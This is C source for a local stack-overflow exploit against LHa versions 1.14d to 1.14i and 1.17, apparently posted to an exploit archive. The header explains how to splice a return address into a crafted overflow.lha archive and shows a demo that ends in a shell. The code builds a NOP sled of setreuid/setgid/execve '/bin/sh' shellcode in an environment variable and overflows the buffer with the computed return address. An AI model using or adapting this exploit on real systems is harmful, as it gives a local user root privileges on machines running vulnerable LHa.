/* Author : N4rK07IX narkotix@linuxmail.org Bug Found By : Ulf Ha"rnhammar LHa buffer overflows and directory traversal problems PROGRAM: LHa (Unix version) VENDOR: various people VULNERABLE VERSIONS: 1.14d to 1.14i // Theze sectionz completely taken from full-disclosure :)) 1.17 (Linux binary) possibly others IMMUNE VERSIONS: 1.14i with my patch applied 1.14h with my patch applied Patch : Ulf Ha"rnhammar made some patch U can find it on : LHa 1.14: http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm http://www2m.biglobe.ne.jp/~dolphin/lha/prog/ LHa 1.17: http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/ --------------------------------------------------------------- Little Explanation about Exploit : Copy the attached overflow.lha file to your directory , i.e /home Then open overflow.lha with text editor(vim is better), U will see there four bytes ŭ˙ż at the end of the line, just delete ŭ˙ż and paste your ASCII RET address there,but make sure not to malform the file.Then run the sploit. Note : overflow.lha file is completely taken from Ulf's post. Demo: addicted@labs:~/c-hell$ ./lha /home/addicted/overflow.lha -------------------------------------------------- | Author : N4rK07IX | narkotix@linuxmail.org |-------------------------------------------------- [+] RET ADDRESS = 0xbffffd90 [!] Paste These ASCII 4 bytes Ret Adress to the XXXX in the file overflow.lha [!] ASCII RET ADDR = ŭ˙ż [+] Exploiting the buffer.. LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUAAAAAAAŭ˙żB sh-2.05b$ Gretingz: Efnet,mathmonkey,Uz4yh4N,laplace_ex,xmlguy,gotcha,forkbomb */ #include #include #include #define BUFFERSIZE 2000 #define FEED 600 #define PATH "/usr/bin/lha" #define PROG "lha" static char shellcode[] = //* setreuid(0,0); "\x31\xc0" // xor %eax,%eax "\x31\xdb" // xor %ebx,%ebx "\x31\xc9" // xor %ecx,%ecx "\xb0\x46" // mov $0x46,%al "\xcd\x80" // int $0x80 /* setgid(0); */ "\x31\xdb" // xor %ebx,%ebx "\x89\xd8" // mov %ebx,%eax "\xb0\x2e" // mov $0x2e,%al "\xcd\x80" // int $0x80 // execve /bin/sh "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp,%ebx "\x8d\x54\x24\x08" // lea 0x8(%esp,1),%edx "\x50" // push %eax "\x53" // push %ebx "\x8d\x0c\x24" // lea (%esp,1),%ecx "\xb0\x0b" // mov $0xb,%al "\xcd\x80" // int $0x80 // exit(); "\x31\xc0" // xor %eax,%eax "\xb0\x01" // mov $0x1,%al "\xcd\x80"; // int $0x80 int main(int argc, char *argv[]) { if( argc < 2 ) { printf("[-] Enter The Full Of the overflow.lha \n"); exit(-1); } printf("--------------------------------------------------\n"); printf("| Author : N4rK07IX\n"); printf("| Found by : Ulf Ha'rnhammar\n"); printf("| LHa 1.14d 1.14i 1.17 Local Lame Stack Overflow Sploit\n"); printf("| narkotix@linuxmail.org\n"); printf("|--------------------------------------------------\n"); char buffer[BUFFERSIZE]; char addict[FEED]; int i, *adr_pointer, *addict_pointer; memset(addict,0x90,sizeof(addict)); memcpy(&addict[FEED-strlen(shellcode)],shellcode,strlen(shellcode)); memcpy(addict,"ADDICT=",7); putenv(addict); unsigned long ret = 0XBFFFFFFA -strlen("/usr/bin/lha") - strlen(addict); printf("[+] RET ADDRESS = 0x%x\n",ret); char l = (ret & 0x000000ff); char a = (ret & 0x0000ff00) >> 8; char m = (ret & 0x00ff0000) >> 16; char e = (ret & 0xff000000) >> 24; printf("[!] Paste These ASCII 4 bytes Ret Adress to the XXXX in the file overflow.lha\n"); printf("[!] ASCII RET ADDR = %c%c%c%c\n",l,a,m,e); printf("[+] Exploiting the buffer..\n"); adr_pointer = (int *)(buffer); for(i = 0 ; i < BUFFERSIZE ; i += 4) *adr_pointer++ = ret; execl(PATH,PROG,"x",argv[1],NULL); if(!execl); perror("execl()"); printf("[+] Done B4by\n"); return 0; }